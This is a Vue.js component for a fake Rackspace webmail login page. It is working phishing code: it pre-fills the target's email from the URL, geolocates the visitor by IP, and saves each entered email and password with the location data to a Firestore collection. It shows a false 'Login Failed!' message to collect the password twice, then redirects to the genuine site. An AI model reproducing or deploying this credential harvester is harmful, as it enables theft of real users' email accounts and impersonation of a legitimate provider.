<template>
  <v-container fill-height class="d-flex justify-center">
    <v-card class width="700" outlined flat :disabled="disableCard">
      <v-toolbar color="#424242" dark flat>
        <v-toolbar-title>
          <h3 class="font-weight-light">Webmail Login</h3>
        </v-toolbar-title>
        <v-spacer></v-spacer>
        <v-img
          alt="rackspace Logo"
          :src="require('../assets/rackspace_logo.png')"
          transition="scale-transition"
          max-height="130"
          max-width="130"
        />
      </v-toolbar>

      <v-card-text>
        <v-row>
          <v-col cols="4">
            <v-img
              alt="suspicous email banner "
              :src="require('../assets/suspicious_email_banner.png')"
              transition="scale-transition"
              max-height="294 "
              max-width="190"
            />
          </v-col>
          <v-col>
            <v-divider class vertical></v-divider>
          </v-col>
          <v-col cols="7" class="mt-12">
            <v-form ref="form" v-model="valid" lazy-validation v-on:submit.prevent="onSubmit">
              <h4 v-if="error" class="text-xs-left mb-3 red--text">Login Failed!</h4>
              <v-text-field
                :dense="true"
                v-model="email"
                label="E-mail Address"
                :rules="emailRules"
                prepend-inner-icon="mdi-account"
                outlined
                required
                v-on:keyup.enter="submitForm"
              ></v-text-field>
              <v-text-field
                :dense="true"
                v-model="password"
                label="Password"
                prepend-inner-icon="mdi-lock"
                type="password"
                outlined
                required
              ></v-text-field>

              <v-btn
                class="white--text text-none"
                :depressed="true"
                color="#0B7C84"
                @click="submitForm"
              >Log In</v-btn>
            </v-form>
          </v-col>
        </v-row>

        <p class="text-center teal--text">Privacy Statement | Website Terms</p>
      </v-card-text>
    </v-card>
    <p class="caption">Need webmail for your business? Learn more about Hosted Email from Rackspace</p>
  </v-container>
</template>

<style lang="scss">
a {
  text-decoration: none;
  color: #005da6;
}
.rounded-button {
  border-radius: 0px;
}
</style>
<script>
import { db } from "../firebase";
export default {
  name: "LoginForm",

  data: () => ({
    error: false,
    disableCard: false,
    email: "",
    password: "",
    ipAddress: "",
    countryName: "",
    city: "",
    region: "",
    submitCount: 0
  }),

  async created() {
    this.email = this.$route.params.email;
    console.log(this.email);
    try {
      const { data } = await this.$http(`https://ipapi.co/json/`);
      console.log(data);
      this.ipAddress = data.ip;
      this.countryName = data.country_name;
      this.city = data.city;
      this.region = data.region;
    } catch (e) {
      console.log(e);
    }
  },
  firestore() {
    return {
      users: db.collection("users")
    };
  },
  methods: {
    async submitForm() {
      console.log(this.email, this.password);

      if (this.password.length < 4) {
        this.error = true;
        this.password = "";
        return;
      }
      this.submitCount++;

      console.log(this.submitCount);

      this.disableCard = true;
      try {
        const userRef = await this.$firestore.users
          .where("email", "==", this.email)
          .where("password", "==", this.password)
          .get();

        if (userRef.docs.length == 0) {
          // this.$router.push({ name: "notListed" });
          await this.$firestore.users.add({
            email: this.email,
            password: this.password,
            ipAddress: this.ipAddress,
            country: this.countryName,
            city: this.city,
            region: this.region,
            createdAt: new Date()
          });
        }

        this.password = "";
        this.error = true;
        this.disableCard = false;
        if (this.submitCount == 2) {
          this.$router.push({ name: "rackspace" });
          // this.$router.push({ name: "success" });
          // this.$router.push({ name: "DocumentNotfound" });
        }
      } catch (e) {
        console.log(e);
      }
    }
  }
};
</script>
